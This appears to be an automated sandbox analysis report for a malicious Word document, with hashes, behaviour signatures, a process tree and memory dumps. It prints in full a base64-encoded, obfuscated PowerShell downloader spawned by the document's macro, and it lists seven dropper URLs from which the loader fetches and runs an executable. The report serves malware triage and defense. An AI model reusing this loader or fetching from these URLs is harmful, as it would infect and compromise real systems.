Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/09/2024, 07:55

General

  • Target

    ed259596d9fedf8d57f93e6565727ee2_JaffaCakes118.doc

  • Size

    226KB

  • MD5

    ed259596d9fedf8d57f93e6565727ee2

  • SHA1

    9dcae85383787d374853d930bd7ae19ef5fc7772

  • SHA256

    4544d813fc5b91be214eff065bf8193df36917dca2e5cbce1a6ee9a782f54d0a

  • SHA512

    30308e6baa36f61c0a867fad0fe77ae6d30dad799ff19423588c5d987db17ce4140bb770ecc8963578e85a90f23890facb50a63996addd34f2972c7e5c8d3460

  • SSDEEP

    3072:PYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////p:R0uXnWFchmmcI/o1/KEP9c8wcy

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://miradoors.md/backup/hFiCHxXv/

exe.dropper

http://kuntur.tur.ar/wp-admin/OBoiKylqUuhlh/

exe.dropper

https://mhsr.ch/wp-admin/qHvi9amkg5llk43185606/

exe.dropper

http://miradoors.ro/cgi-bin/vhUgA4mu6tg1x461/

exe.dropper

http://nikniek.nl/cgi-bin/A74t5p0sobrc273635587/

exe.dropper

http://qualityhairbundles.com/of/FIKQDxATiQHEd/

exe.dropper

http://karaz.atwebpages.com/admin/2a4j1aqkks855324/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed259596d9fedf8d57f93e6565727ee2_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2612
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABYAGIAcwBjAGMAMQAwAD0AKAAoACcAWQA0ACcAKwAnAHUAZgAnACkAKwAoACcAcAAnACsAJwB4AGYAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AHQAZQBNAFAAXABXAE8AcgBkAFwAMgAwADEAOQBcACAALQBpAHQAZQBtAHQAeQBwAGUAIABkAGkAUgBFAGMAVABvAHIAeQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBgAEUAYwBVAFIAaQB0AFkAUABSAG8AdABvAGAAQwBgAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAsACcAKQArACgAJwAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxACcAKwAnADEAJwApACsAKAAnACwAJwArACcAIAB0AGwAJwApACsAJwBzACcAKQA7ACQARQByAGkAcAB0AG8AaAAgAD0AIAAoACgAJwBHAGwAJwArACcAawAnACsAJwB0ADAANwBjACcAKQArACcAOQAnACkAOwAkAFkAYwBpAHUAegBkADMAPQAoACgAJwBHADQAYwAnACsAJwBxACcAKQArACcAZwAnACsAJwBuADMAJwApADsAJABNAHUAbwBiAGwANgB5AD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwBQACcAKwAoACcAdgAnACsAJwBEAHcAJwApACsAKAAnAG8AcgAnACsAJwBkACcAKQArACgAJwBQAHYAJwArACcARAAyACcAKwAnADAAMQA5AFAAdgAnACsAJwBEACcAKQApAC0AUgBFAHAAbABBAEMARQAoACcAUAAnACsAJwB2AEQAJwApACwAWwBjAEgAYQByAF0AOQAyACkAKwAkAEUAcgBpAHAAdABvAGgAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFcAZABzAGwAcwB1AHQAPQAoACgAJwBOACcAKwAnAGcAaQAnACkAKwAoACcAZAAnACsAJwB6AHkAJwApACsAJwBhACcAKQA7ACQAUQByADIAMwBjAG4AOAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgB3AEUAYgBjAEwAaQBlAE4AVAA7ACQAVQBtADkAaQAxADQAZAA9ACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAvACcAKQArACgAJwAvAG0AJwArACcAaQByAGEAZAAnACsAJwBvAG8AJwApACsAJwByACcAKwAoACcAcwAuACcAKwAnAG0AJwApACsAKAAnAGQALwAnACsAJwBiACcAKQArACcAYQBjACcAKwAnAGsAdQAnACsAJwBwAC8AJwArACcAaABGACcAKwAoACcAaQBDAEgAJwArACcAeABYAHYAJwArACcALwAqAGgAdAAnACkAKwAnAHQAcAAnACsAKAAnADoALwAvAGsAdQBuACcAKwAnAHQAdQByACcAKQArACgAJwAuAHQAJwArACcAdQByACcAKQArACgAJwAuAGEAJwArACcAcgAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AJwArACgAJwBhACcAKwAnAGQAbQBpACcAKQArACcAbgAvACcAKwAnAE8AJwArACcAQgBvACcAKwAoACcAaQBLAHkAJwArACcAbABxACcAKQArACgAJwBVAHUAJwArACcAaABsAGgALwAnACsAJwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcABzACcAKwAnADoALwAvAG0AaAAnACkAKwAoACcAcwAnACsAJwByAC4AJwApACsAJwBjAGgAJwArACgAJwAvAHcAcAAnACsAJwAtACcAKQArACcAYQAnACsAJwBkAG0AJwArACcAaQBuACcAKwAoACcALwBxAEgAdgAnACsAJwBpADkAYQBtACcAKwAnAGsAJwApACsAKAAnAGcANQBsACcAKwAnAGwAawA0ACcAKQArACgAJwAzADEAJwArACcAOAA1ADYAMAAnACkAKwAnADYAJwArACgAJwAvACcAKwAnACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAJwArACcAOgAvACcAKQArACgAJwAvAG0AJwArACcAaQByACcAKQArACgAJwBhACcAKwAnAGQAbwBvAHIAcwAuACcAKQArACgAJwByAG8ALwBjAGcAJwArACcAaQAtACcAKQArACcAYgAnACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHYAJwApACsAKAAnAGgAVQAnACsAJwBnAEEANAAnACkAKwAoACcAbQB1ADYAJwArACcAdAAnACkAKwAnAGcAMQAnACsAJwB4ACcAKwAoACcANAAnACsAJwA2ADEALwAqAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJwAvAG4AJwApACsAJwBpACcAKwAoACcAawBuACcAKwAnAGkAJwApACsAKAAnAGUAawAuAG4AJwArACcAbAAnACkAKwAoACcALwBjACcAKwAnAGcAaQAtACcAKQArACcAYgAnACsAKAAnAGkAJwArACcAbgAvAEEANwAnACkAKwAoACcANAB0ADUAJwArACcAcAAnACkAKwAnADAAJwArACcAcwBvACcAKwAoACcAYgByACcAKwAnAGMAMgAnACkAKwAoACcANwAzADYAJwArACcAMwA1ACcAKQArACgAJwA1ACcAKwAnADgANwAvACcAKQArACgAJwAqAGgAJwArACcAdAB0AHAAJwApACsAJwA6ACcAKwAoACcALwAnACsAJwAvAHEAdQAnACkAKwAoACcAYQAnACsAJwBsAGkAJwApACsAKAAnAHQAJwArACcAeQBoACcAKQArACgAJwBhAGkAcgBiACcAKwAnAHUAJwApACsAJwBuACcAKwAnAGQAJwArACgAJwBsAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AJwArACcAbQAvAG8AZgAvACcAKwAnAEYAJwArACcASQAnACsAJwBLAFEARAB4AEEAJwApACsAJwBUACcAKwAnAGkAUQAnACsAJwBIAEUAJwArACcAZAAnACsAJwAvACoAJwArACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQArACcAOgAnACsAJwAvACcAKwAoACcALwBrACcAKwAnAGEAcgAnACkAKwAoACcAYQB6ACcAKwAnAC4AYQAnACkAKwAnAHQAdwAnACsAKAAnAGUAJwArACcAYgAnACsAJwBwAGEAZwAnACsAJwBlAHMALgBjAG8AbQAvACcAKQArACgAJwBhACcAKwAnAGQAbQAnACkAKwAnAGkAbgAnACsAKAAnAC8AMgAnACsAJwBhADQAagAnACkAKwAoACcAMQBhAHEAJwArACcAawBrAHMAJwArACcAOAA1ACcAKQArACgAJwA1ADMAMgAnACsAJwA0ACcAKQArACcALwAnACkALgAiAHMAcABMAGAASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATwBvAGUAeAAyADAAagA9ACgAJwBVACcAKwAoACcAMgBnADUAYwAnACsAJwBqACcAKQArACcAYwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABFAHcANwB6AGUAOQBpACAAaQBuACAAJABVAG0AOQBpADEANABkACkAewB0AHIAeQB7ACQAUQByADIAMwBjAG4AOAAuACIARABvAFcATgBMAE8AYABBAGQAYABGAGkAYABsAEUAIgAoACQARQB3ADcAegBlADkAaQAsACAAJABNAHUAbwBiAGwANgB5ACkAOwAkAE8AMABkADMAdQB4AGcAPQAoACgAJwBOADgAYgBzADcAJwArACcAegAnACkAKwAnADEAJwApADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAE0AdQBvAGIAbAA2AHkAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAzADEAOQA3ADYAKQAgAHsALgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUALQBJAHQAZQBtACcAKQAoACQATQB1AG8AYgBsADYAeQApADsAJABDADcAMwBpAGUANgA4AD0AKAAoACcAVQAnACsAJwB0ADMAbwAxAGoAJwApACsAJwBqACcAKQA7AGIAcgBlAGEAawA7ACQARwB1ADIAdQBqAHEAOQA9ACgAJwBUAGUAJwArACcANQA5ACcAKwAoACcAMwAnACsAJwA1AGQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AYgBfAG8AawAyAHAAPQAoACgAJwBFADkAJwArACcAMgBkAG8AJwApACsAJwBfADUAJwApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2804

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      d84728df7ac9325456e5161850951832

      SHA1

      762eaef554a9035f9e4032683bdc40822682c5ae

      SHA256

      02cfbaa8e616b1cd8cd40d4973273fc16959731148725d839076d1aad0e19f95

      SHA512

      f3f0e3d1a02418d8ca6d31c553b533189499ed24ad9f85da69818fcba7c2eff561da8a06ba78b121eeee699a35cee4eded5aa2ec4e6baf6adceb7678836c08c6

    • memory/2484-13-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-25-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-6-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-5-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-11-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-26-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-9-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-8-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-7-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-14-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-20-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-21-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-17-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-18-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-16-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-15-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-12-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-0-0x000000002F731000-0x000000002F732000-memory.dmp

      Filesize

      4KB

    • memory/2484-2-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2484-22-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-10-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-24-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-23-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-29-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-31-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-30-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-28-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-27-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-59-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2484-39-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2484-40-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-41-0x0000000000370000-0x0000000000470000-memory.dmp

      Filesize

      1024KB

    • memory/2484-58-0x000000007174D000-0x0000000071758000-memory.dmp

      Filesize

      44KB

    • memory/2484-57-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2804-38-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

      Filesize

      32KB

    • memory/2804-37-0x000000001B740000-0x000000001BA22000-memory.dmp

      Filesize

      2.9MB